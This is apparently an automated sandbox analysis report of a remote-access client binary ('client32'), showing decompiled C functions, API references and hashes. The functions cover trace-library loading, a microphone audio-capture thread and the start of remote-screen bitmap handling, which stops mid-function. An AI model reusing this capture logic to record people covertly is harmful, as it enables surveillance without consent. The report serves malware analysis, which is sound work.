0x11144612
0x11144612
0x11144615
0x1114461b
0x1114461c
0x1114461d
0x11144622
0x00000000
0x11144628
0x11144628
0x11144631
0x11144636
0x1114463b
0x11144640
0x1114463d
0x1114463d
0x1114463d
0x1114464d
0x1114464f
0x11144652
0x1114465b
0x11144671
0x1114467f
0x1114468f
0x11144695
0x111446a3
0x111446a5
0x111446b5
0x111446b5
0x111446b5
0x1114467f
0x1114465b
0x11144622
0x111446bd
0x111446bf
0x111446c5
0x111446c7
0x111446ca
0x111446cf
0x111447b8
0x111447be
0x111447c0
0x00000000
0x111446d5
0x111446de
0x111446df
0x111446e5
0x111446e6
0x111446e7
0x111446ec
0x00000000
0x111446f2
0x111446f2
0x111446fa
0x1114471e
0x11144720
0x111446fc
0x11144709
0x1114470b
0x1114470b
0x1114472a
0x11144730
0x11144736
0x1114473b
0x11144742
0x11144748
0x1114474e
0x11144754
0x1114475a
0x1114476b
0x11144776
0x1114477b
0x11144780
0x11144785
0x11144782
0x11144782
0x11144782
0x1114479b
0x1114479d
0x111447a3
0x111447a8
0x111447b1
0x111447b3
0x111447c3
0x111447c3
0x111447c3
0x111447a8
0x1114476b
0x111446ec
0x111447e7

APIs

_memset.LIBCMT ref: 111445AB
_memset.LIBCMT ref: 111445BE
wsprintfA.USER32 ref: 111445F4
_strrchr.LIBCMT ref: 11144631
wsprintfA.USER32 ref: 1114464D
wsprintfA.USER32 ref: 111446A3
wsprintfA.USER32 ref: 111446B0
wsprintfA.USER32 ref: 111446BD
wsprintfA.USER32 ref: 11144709
wsprintfA.USER32 ref: 1114471E
_strrchr.LIBCMT ref: 11144776
wsprintfA.USER32 ref: 11144799
wsprintfA.USER32 ref: 111447B1
wsprintfA.USER32 ref: 111447BE
wsprintfA.USER32 ref: 111447CB

Strings

<unknown symbol>, xrefs: 111447B8
, %s, Line %d, xrefs: 11144793
<unknown module>, xrefs: 111446AA
%s + %d bytes, xrefs: 11144718
(%d.%02d.%d.%d), xrefs: 1114469D
0x%08X , xrefs: 111445CA
+ %d bytes, xrefs: 111447AB

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$_memset_strrchr
String ID: (%d.%02d.%d.%d)$ + %d bytes$%s + %d bytes$, %s, Line %d$0x%08X $<unknown module>$<unknown symbol>
API String ID: 4236257132-983257157
Opcode ID: a0ef6df3c23f1de90c9332116cf72623786e7006b97500c467b7cdb199fce978
Instruction ID: 293bca24da915293cfb006549a27a8b3087cf55c4de6a639cfa4b0299eb0fa9d
Opcode Fuzzy Hash: a0ef6df3c23f1de90c9332116cf72623786e7006b97500c467b7cdb199fce978
Instruction Fuzzy Hash: 675185B1940629ABDB25CB258C40FEAF3BCAF45708F0041D9FD08A2640EB75AB55CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 11146270 Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 58
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 93%

			E11146270(void* __edi, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t2;
				void* _t14;
				void* _t18;
				struct HINSTANCE__* _t19;

				 *0x111eb848 = 0;
				E11143CE0(_t14, __edi, _t18, 0);
				_t2 = GetModuleHandleA("NSMTRACE");
				_t19 = _t2;
				if(_t19 != 0) {
					_push(__edi);
					 *0x111f1ea0 = GetProcAddress(_t19, "NSMTraceLoad");
					 *0x111f1e9c = GetProcAddress(_t19, "NSMTraceUnload");
					 *0x111f1e98 = GetProcAddress(_t19, "NSMTraceGetConfigItem");
					 *0x111f1e94 = GetProcAddress(_t19, "NSMTraceGetConfigInt");
					 *0x111f1e90 = GetProcAddress(_t19, "vRealNSMTrace");
					 *0x111f1e8c = GetProcAddress(_t19, "NSMTraceClose");
					 *0x111f1e88 = GetProcAddress(_t19, "NSMTraceReadConfigItemFromFile");
					 *0x111f1e84 = GetProcAddress(_t19, "NSMTraceExclusive");
					 *0x111f1e80 = GetProcAddress(_t19, "NSMTraceUnexclusive");
					 *0x111f1e7c = GetProcAddress(_t19, "NSMTraceSetModuleName");
					return 1;
				} else {
					return _t2;
				}
			}

0x11146273
0x1114627d
0x1114628a
0x11146290
0x11146294
0x11146298
0x111462ad
0x111462ba
0x111462c7
0x111462d4
0x111462e1
0x111462ee
0x111462fb
0x11146308
0x11146315
0x1114631d
0x11146328
0x11146297
0x11146297
0x11146297

APIs

Part of subcall function 11143CE0: GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 11143D1B
Part of subcall function 11143CE0: _strrchr.LIBCMT ref: 11143D2A
Part of subcall function 11143CE0: _strrchr.LIBCMT ref: 11143D3A
Part of subcall function 11143CE0: wsprintfA.USER32 ref: 11143D55

GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 111462A5
GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 111462B2
GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 111462BF
GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 111462CC
GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 111462D9
GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 111462E6
GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 111462F3
GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 11146300
GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 1114630D
GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 1114631A

Strings

NSMTRACE, xrefs: 11146285
NSMTraceLoad, xrefs: 1114629F
vRealNSMTrace, xrefs: 111462CE
NSMTraceGetConfigItem, xrefs: 111462B4
NSMTraceReadConfigItemFromFile, xrefs: 111462E8
NSMTraceExclusive, xrefs: 111462F5
NSMTraceSetModuleName, xrefs: 1114630F
NSMTraceUnexclusive, xrefs: 11146302
NSMTraceClose, xrefs: 111462DB
NSMTraceUnload, xrefs: 111462A7
NSMTraceGetConfigInt, xrefs: 111462C1

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
API String ID: 3896832720-3703587661
Opcode ID: 4a9ea036915f179722395e8dc0fd9ac4a12141907cda7860a4eb47a17f8f2bf1
Instruction ID: f57ee56c394f0cb9b00f8b4099bcc1512020c1dff5e65ba52801e9a68d189d03
Opcode Fuzzy Hash: 4a9ea036915f179722395e8dc0fd9ac4a12141907cda7860a4eb47a17f8f2bf1
Instruction Fuzzy Hash: 5A01827491123666CB157F7B9C98ECBFEBC9B8631CB814436F41493506D6B89004CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1100C0F0 Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 332
sleepCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1100C0F0(void* __ebx, void* __ecx, signed int _a4) {
				signed int _v8;
				struct HWAVEIN__* _v12;
				intOrPtr _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				char _v284;
				void* _v288;
				void* __edi;
				long _t92;
				signed int _t95;
				long _t97;
				signed int _t100;
				void* _t101;
				long _t104;
				signed int _t112;
				intOrPtr _t114;
				signed int _t116;
				signed int _t118;
				void* _t120;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t135;
				signed int _t136;
				long _t149;
				intOrPtr* _t151;
				void* _t153;
				signed int _t154;
				struct _CRITICAL_SECTION* _t156;
				signed int _t157;
				CHAR* _t159;
				intOrPtr _t167;
				signed int _t173;
				CHAR* _t174;
				long _t176;
				intOrPtr* _t177;
				signed int _t182;
				signed int _t185;
				void* _t190;
				void* _t191;
				intOrPtr* _t192;
				long _t196;
				struct wavehdr_tag* _t197;
				long _t199;
				void* _t202;
				void* _t204;
				void* _t205;

				_t153 = __ebx;
				E110B7EF0(__ecx, "Audio");
				InterlockedIncrement(0x111ede24);
				_t92 =  *0x111ede24; // 0x0
				E11147060(_t191, "Audiothread started, threadcnt=%d\n", _t92);
				_t192 = _a4;
				_v16 =  *((intOrPtr*)(_t192 + 0x8c));
				_t204 = _t202 + 0xc;
				_t208 =  *((char*)(_t192 + 0x239)) - 5;
				_v24 =  *((intOrPtr*)(_t192 + 0x90));
				_v32 =  *((intOrPtr*)(_t192 + 0x1e8));
				_v20 =  *((intOrPtr*)(_t192 + 0x1ec));
				if( *((char*)(_t192 + 0x239)) == 5) {
					E1100B440(_t208, _t192);
					_t204 = _t204 + 4;
				}
				_t95 =  *(_t192 + 0x408);
				_v288 =  *((intOrPtr*)(_t192 + 0x88));
				if(_t95 == 0) {
					L5:
					_push(_t153);
					do {
						asm("sbb esi, esi");
						_t196 = ( ~( *(_t192 + 0x408) & 0x000000ff) & 0x00000010) + 1;
						if( *((intOrPtr*)(_t192 + 0x40c)) == 0) {
							__eflags =  *((char*)(_t192 + 0x239)) - 6;
							asm("sbb eax, eax");
							_t97 = (_t95 & 0xfffffe0b) + 0x1f4;
							__eflags = _t97;
						} else {
							_t97 = 0x32;
						}
						_t154 = WaitForMultipleObjects(_t196,  &_v288, 0, _t97);
						if(_t154 != 0xffffffff) {
							__eflags = _t154;
							if(_t154 == 0) {
								goto L16;
							}
							goto L14;
						} else {
							_t149 = GetLastError();
							if(_t149 == 5 || _t149 == 6) {
								_push(_t196);
								E11147060(_t192, "Error %d waiting for audio (nEvents=%d)\n", _t149);
								_t204 = _t204 + 0xc;
								Sleep(0x3e8);
							}
							L14:
							if(_t154 >= _t196) {
								L16:
								__eflags = _t154 - 0x102;
								if(_t154 == 0x102) {
									E1100AEE0(_t154, _t192);
									_t204 = _t204 + 4;
								}
								L18:
								while(1) {
									L18:
									while(1) {
										L18:
										while(1) {
											do {
												do {
													L18:
													while( *((char*)(_t192 + 0x239)) >= 6) {
														if( *((char*)(_t192 + 0x23a)) != 0 &&  *(_t192 + 0x458) != 0) {
															_t104 = GetTickCount();
															_t199 = _t104;
															if(_t104 -  *(_t192 + 0x45c) >= 0x7d0) {
																E1100D8B0(_t166, 0, 0);
																_t204 = _t204 + 8;
																 *(_t192 + 0x45c) = _t199;
															}
														}
														_t166 = _v24;
														_t101 = E11110920(_v24);
														_t198 = _t101;
														if(_t101 == 0) {
															break;
														} else {
															E1100B720(_t192, _t198);
															E11163AA5(_t198);
															_t204 = _t204 + 0xc;
															continue;
														}
													}
													_t197 = E11110920(_v16);
													__eflags = _t197;
													if(_t197 != 0) {
														goto L30;
													}
													_t166 = _v32;
													_t131 = E11110920(_v32);
													__eflags = _t131;
													if(_t131 == 0) {
														_t166 = _v20;
														_t95 = E11110920(_v20);
														__eflags = _t95;
														if(_t95 == 0) {
															goto L58;
														}
														E1100B340(_t192, _t95, 2);
														_t204 = _t204 + 0xc;
														continue;
													}
													E1100B340(_t192, _t131, 1);
													_t204 = _t204 + 0xc;
													continue;
													L30:
													_t166 = _t197->dwBytesRecorded;
													_t100 =  *(_t192 + 0x84);
													 *(_t192 + 0x94) =  *(_t192 + 0x94) - _t197->dwBytesRecorded;
													_v12 = _t100;
													__eflags = _t100;
												} while (_t100 == 0);
												_t182 =  *(_t192 + 0x1dc);
												__eflags = _t182;
											} while (_t182 != 0);
											__eflags =  *((intOrPtr*)(_t192 + 8)) - _t182;
											if( *((intOrPtr*)(_t192 + 8)) == _t182) {
												L57:
												_t156 = _t192 + 0x28;
												EnterCriticalSection(_t156);
												_t166 = _v12;
												waveInUnprepareHeader(_v12, _t197, 0x20);
												waveInPrepareHeader(_v12, _t197, 0x20);
												waveInAddBuffer(_v12, _t197, 0x20);
												LeaveCriticalSection(_t156);
												continue;
											}
											_t167 =  *((intOrPtr*)(_t192 + 0x74));
											_t112 =  *(_t192 + 0x94) * 0x64;
											__eflags = _t112 /  *(_t167 + 8) - 0x14;
											if(_t112 /  *(_t167 + 8) > 0x14) {
												goto L57;
											}
											_t114 = E1100BD50( *_t192, 0xffffffff);
											_t185 = _t197->dwBytesRecorded;
											_v28 = _t114;
											_t116 =  *( *((intOrPtr*)(_t192 + 0x74)) + 0xe) & 0x0000ffff;
											_t157 = 0;
											_v8 = _t185;
											_a4 = 0;
											__eflags = _t116 - 8;
											if(_t116 != 8) {
												__eflags = _t116 - 0x10;
												if(_t116 != 0x10) {
													L51:
													__eflags = _t157 - _v28;
													if(_t157 > _v28) {
														 *(_t192 + 0x1d8) = 0;
													}
													E1100BC30(_t192, _t157, 0xffffffff);
													_t204 = _t204 + 8;
													__eflags =  *(_t192 + 0x1d8) -  *((intOrPtr*)(_t192 + 0x208));
													if( *(_t192 + 0x1d8) >=  *((intOrPtr*)(_t192 + 0x208))) {
														 *(_t192 + 0x1d8) = 0x3e7;
													} else {
														_t118 = _v8;
														__eflags = _t118;
														if(_t118 != 0) {
															_a4 = _t118;
															_t120 = L11009D40(0, _t192,  *((intOrPtr*)(_t192 + 0x7c)), _t197->lpData,  &_v8);
															 *((intOrPtr*)( *((intOrPtr*)(_t192 + 8))))( *((intOrPtr*)(_t192 + 0xc)), _t120, _v8, _a4,  *(_t192 + 0x78) & 0x0000ffff);
															E11163AA5(_t120);
															_t204 = _t204 + 0x10;
															 *((intOrPtr*)(_t192 + 0x230)) = GetTickCount();
														}
													}
													goto L57;
												}
												_t159 = _t197->lpData;
												 *(_t192 + 0x1d8) =  *(_t192 + 0x1d8) + 1;
												asm("cdq");
												_t128 = _t185 - _t185 >> 1;
												__eflags = _t128;
												if(_t128 <= 0) {
													L50:
													_a4 = _a4 >> 8;
													_t157 = _a4;
													goto L51;
												}
												do {
													_t173 =  *_t159;
													_t159 =  &(_t159[2]);
													__eflags = _t173;
													if(_t173 < 0) {
														_t173 =  ~_t173;
													}
													__eflags = _t173 - _a4;
													if(_t173 >= _a4) {
														_a4 = _t173;
													}
													_t128 = _t128 - 1;
													__eflags = _t128;
												} while (_t128 != 0);
												goto L50;
											}
											_t174 = _t197->lpData;
											 *(_t192 + 0x1d8) =  *(_t192 + 0x1d8) + 1;
											__eflags = _t185;
											if(_t185 <= 0) {
												goto L51;
											} else {
												goto L36;
											}
											do {
												L36:
												_t129 =  *_t174 & 0x000000ff;
												_t174 =  &(_t174[1]);
												_t130 = _t129 - 0x7f;
												__eflags = _t130;
												if(_t130 < 0) {
													_t130 =  ~_t130;
												}
												__eflags = _t130 - _t157;
												if(_t130 >= _t157) {
													_a4 = _t130;
													_t157 = _t130;
												}
												_t185 = _t185 - 1;
												__eflags = _t185;
											} while (_t185 != 0);
											goto L51;
										}
									}
								}
							}
							E1100B870(_t192, _t192, _t154 - 1);
							_t204 = _t204 + 8;
							goto L18;
						}
						L58:
						 *((intOrPtr*)(_t192 + 0x20c)) = 1;
						__eflags =  *(_t192 + 0x1dc);
					} while ( *(_t192 + 0x1dc) == 0);
					E1100A6C0(_t192, _t192);
					E1100AD10(_t192);
					E1100A1C0(_t192);
					_t135 =  *(_t192 + 0x400);
					_t205 = _t204 + 0xc;
					__eflags = _t135;
					if(_t135 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x21c))))(_t135, 0);
						 *(_t192 + 0x400) = 0;
					}
					_t136 =  *(_t192 + 0x410);
					__eflags = _t136;
					if(_t136 != 0) {
						E11163AA5(_t136);
						_t205 = _t205 + 4;
						 *(_t192 + 0x410) = 0;
					}
					__eflags =  *((char*)(_t192 + 0x239)) - 6;
					if( *((char*)(_t192 + 0x239)) >= 6) {
						E11147060(_t192, "Vista AudioCap FreeInstance (pAudioCap=%p)\n",  *(_t192 + 0x458));
						_t205 = _t205 + 8;
						__eflags =  *(_t192 + 0x458);
						if( *(_t192 + 0x458) != 0) {
							E1100D7D0();
						}
					}
					 *(_t192 + 0x1dc) = 0;
					InterlockedDecrement(0x111ede24);
					_t176 =  *0x111ede24; // 0x0
					E11147060(_t192, "Audiothread stopped, threadcnt=%d\n", _t176);
					__eflags = 0;
					return 0;
				} else {
					_t151 =  &_v284;
					_t177 = _t192 + 0x250;
					_t190 = 0x10;
					do {
						 *_t151 =  *_t177;
						_t151 = _t151 + 4;
						_t177 = _t177 + 0x14;
						_t190 = _t190 - 1;
					} while (_t190 != 0);
					goto L5;
				}
			}

0x1100c0f0
0x1100c100
0x1100c10d
0x1100c113
0x1100c11e
0x1100c123
0x1100c138
0x1100c141
0x1100c144
0x1100c14b
0x1100c14e
0x1100c151
0x1100c154
0x1100c157
0x1100c15c
0x1100c15c
0x1100c15f
0x1100c16b
0x1100c173
0x1100c193
0x1100c193
0x1100c194
0x1100c19f
0x1100c1a4
0x1100c1ac
0x1100c1b5
0x1100c1bc
0x1100c1c3
0x1100c1c3
0x1100c1ae
0x1100c1ae
0x1100c1ae
0x1100c1d9
0x1100c1de
0x1100c20c
0x1100c20e
0x00000000
0x00000000
0x00000000
0x1100c1e0
0x1100c1e0
0x1100c1e9
0x1100c1f0
0x1100c1f7
0x1100c1fc
0x1100c204
0x1100c204
0x1100c210
0x1100c212
0x1100c221
0x1100c221
0x1100c227
0x1100c22a
0x1100c22f
0x1100c22f
0x00000000
0x1100c232
0x00000000
0x1100c232
0x00000000
0x1100c232
0x1100c232
0x1100c232
0x00000000
0x1100c232
0x1100c242
0x1100c24d
0x1100c253
0x1100c260
0x1100c266
0x1100c26b
0x1100c26e
0x1100c26e
0x1100c260
0x1100c274
0x1100c277
0x1100c27c
0x1100c280
0x00000000
0x1100c282
0x1100c284
0x1100c28a
0x1100c28f
0x00000000
0x1100c28f
0x1100c280
0x1100c29c
0x1100c29e
0x1100c2a0
0x00000000
0x00000000
0x1100c2a2
0x1100c2a5
0x1100c2aa
0x1100c2ac
0x1100c2bf
0x1100c2c2
0x1100c2c7
0x1100c2c9
0x00000000
0x00000000
0x1100c2d3
0x1100c2d8
0x00000000
0x1100c2d8
0x1100c2b2
0x1100c2b7
0x00000000
0x1100c2e0
0x1100c2e0
0x1100c2e3
0x1100c2e9
0x1100c2ef
0x1100c2f2
0x1100c2f2
0x1100c2fa
0x1100c300
0x1100c300
0x1100c308
0x1100c30b
0x1100c431
0x1100c431
0x1100c435
0x1100c43b
0x1100c442
0x1100c44f
0x1100c45c
0x1100c463
0x00000000
0x1100c463
0x1100c317
0x1100c31a
0x1100c320
0x1100c323
0x00000000
0x00000000
0x1100c32d
0x1100c332
0x1100c335
0x1100c33b
0x1100c33f
0x1100c341
0x1100c344
0x1100c347
0x1100c34a
0x1100c371
0x1100c374
0x1100c3ae
0x1100c3ae
0x1100c3b1
0x1100c3b3
0x1100c3b3
0x1100c3c0
0x1100c3cb
0x1100c3ce
0x1100c3d4
0x1100c427
0x1100c3d6
0x1100c3d6
0x1100c3d9
0x1100c3db
0x1100c3e4
0x1100c3ef
0x1100c40e
0x1100c411
0x1100c416
0x1100c41f
0x1100c41f
0x1100c3db
0x00000000
0x1100c3d4
0x1100c376
0x1100c378
0x1100c380
0x1100c383
0x1100c385
0x1100c387
0x1100c3a7
0x1100c3a7
0x1100c3ab
0x00000000
0x1100c3ab
0x1100c390
0x1100c390
0x1100c393
0x1100c396
0x1100c398
0x1100c39a
0x1100c39a
0x1100c39c
0x1100c39f
0x1100c3a1
0x1100c3a1
0x1100c3a4
0x1100c3a4
0x1100c3a4
0x00000000
0x1100c390
0x1100c34c
0x1100c34e
0x1100c354
0x1100c356
0x00000000
0x00000000
0x00000000
0x00000000
0x1100c358
0x1100c358
0x1100c358
0x1100c35b
0x1100c35c
0x1100c35c
0x1100c35f
0x1100c361
0x1100c361
0x1100c363
0x1100c365
0x1100c367
0x1100c36a
0x1100c36a
0x1100c36c
0x1100c36c
0x1100c36c
0x00000000
0x1100c36f
0x1100c232
0x1100c232
0x1100c232
0x1100c217
0x1100c21c
0x00000000
0x1100c21c
0x1100c46e
0x1100c474
0x1100c47e
0x1100c47e
0x1100c487
0x1100c48d
0x1100c493
0x1100c498
0x1100c49e
0x1100c4a4
0x1100c4a6
0x1100c4b0
0x1100c4b2
0x1100c4b2
0x1100c4b8
0x1100c4be
0x1100c4c0
0x1100c4c3
0x1100c4c8
0x1100c4cb
0x1100c4cb
0x1100c4d1
0x1100c4d8
0x1100c4e6
0x1100c4eb
0x1100c4ee
0x1100c4f4
0x1100c4f6
0x1100c4f6
0x1100c4f4
0x1100c500
0x1100c506
0x1100c50c
0x1100c518
0x1100c521
0x1100c527
0x1100c175
0x1100c175
0x1100c17b
0x1100c181
0x1100c186
0x1100c188
0x1100c18a
0x1100c18d
0x1100c190
0x1100c190
0x00000000
0x1100c186

APIs

InterlockedIncrement.KERNEL32(111EDE24), ref: 1100C10D
WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 1100C1D3
GetLastError.KERNEL32(?,?,00000000,?), ref: 1100C1E0
Sleep.KERNEL32(000003E8), ref: 1100C204
GetTickCount.KERNEL32 ref: 1100C24D
_free.LIBCMT ref: 1100C28A

Part of subcall function 1100B440: _malloc.LIBCMT ref: 1100B496
Part of subcall function 1100B440: EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,0CBC1010,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
Part of subcall function 1100B440: CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
Part of subcall function 1100B440: _calloc.LIBCMT ref: 1100B519
Part of subcall function 1100B440: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
Part of subcall function 1100B440: LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579

_free.LIBCMT ref: 1100C411
GetTickCount.KERNEL32 ref: 1100C419
EnterCriticalSection.KERNEL32(?,?,?,00000000,?), ref: 1100C435
waveInUnprepareHeader.WINMM(?,00000000,00000020,?,?,00000000,?), ref: 1100C442
waveInPrepareHeader.WINMM(?,00000000,00000020,?,?,00000000,?), ref: 1100C44F
waveInAddBuffer.WINMM(?,00000000,00000020,?,?,00000000,?), ref: 1100C45C
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?), ref: 1100C463
_free.LIBCMT ref: 1100C4C3
InterlockedDecrement.KERNEL32(111EDE24), ref: 1100C506

Strings

Error %d waiting for audio (nEvents=%d), xrefs: 1100C1F2
Vista AudioCap FreeInstance (pAudioCap=%p), xrefs: 1100C4E1
Audiothread started, threadcnt=%d, xrefs: 1100C119
Audiothread stopped, threadcnt=%d, xrefs: 1100C513
Audio, xrefs: 1100C0FB

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$_freewave$CountCreateEnterHeaderInterlockedLeaveTick$BufferDecrementErrorEventFileIncrementLastMultipleObjectsPrepareSleepUnprepareWait_calloc_malloc
String ID: Audio$Audiothread started, threadcnt=%d$Audiothread stopped, threadcnt=%d$Error %d waiting for audio (nEvents=%d)$Vista AudioCap FreeInstance (pAudioCap=%p)
API String ID: 4143487924-3268596948
Opcode ID: 8b355c5db468c8f61bac5f13f0e33c55d36369677e20b5308214b4dacb377572
Instruction ID: ce4536ffc1536091952ef6b0c0b09b4d7bc44372ab8792d62394f68665881c24
Opcode Fuzzy Hash: 8b355c5db468c8f61bac5f13f0e33c55d36369677e20b5308214b4dacb377572
Instruction Fuzzy Hash: 66C1E774E00717ABF708CFB4C984BAEF7A4FF45348F1082A5E96996641EB30B951CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1111C2B0 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 201
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E1111C2B0(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				signed int _v20;
				int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t63;
				void* _t68;
				void* _t70;
				struct HBITMAP__* _t73;
				void* _t94;
				void* _t104;
				struct HDC__* _t107;
				void* _t109;
				void* _t121;
				void* _t133;
				int _t136;
				BITMAPINFO* _t137;
				void* _t139;
				void* _t140;
				void* _t141;

				_t121 = __edx;
				_t109 = __ecx;
				_t133 = __eax;
				_t63 =  *((intOrPtr*)(__eax + 0x348));
				if( *_t63 != 0x13) {
					_v8 =  *(_t63 + 6) & 0x000000ff;
				} else {
					_v8 = 8;
				}
				E11114890(0, _t133,  &_v28, _t109, 0);
				_t136 = _v16 - _v24;
				_t140 = _t139 + 8;
				_v12 = _t136;
				if(_a8 != 0) {
					_t106 = _v20;
				} else {
					_t98 =  *(_t133 + 0x3b0);
					if( *(_t133 + 0x3b0) != 0) {
						E11163AA5(_t98);
						_t140 = _t140 + 4;
					}
					_t106 = _v20;
					asm("cdq");
					_t104 = E1116406B(_t109, 1, (_v20 * _v8 + _t121 >> 3) * _t136);
					_t140 = _t140 + 8;
					 *(_t133 + 0x3b0) = _t104;
					if(_t104 == 0) {
						E11029A70("idata->dos_DIB", "..\\ctl32\\Remote.cpp", 0x2f8e);
						_t140 = _t140 + 0xc;
					}
				}
				_t68 = _v8 - 1;
				if(_t68 == 0) {
					_t70 = E111146E0(_t106 & 0x0000ffff, _t136, _a4, _t133, _a4);
					goto L15;
				} else {
					_t94 = _t68 - 3;
					if(_t94 == 0) {
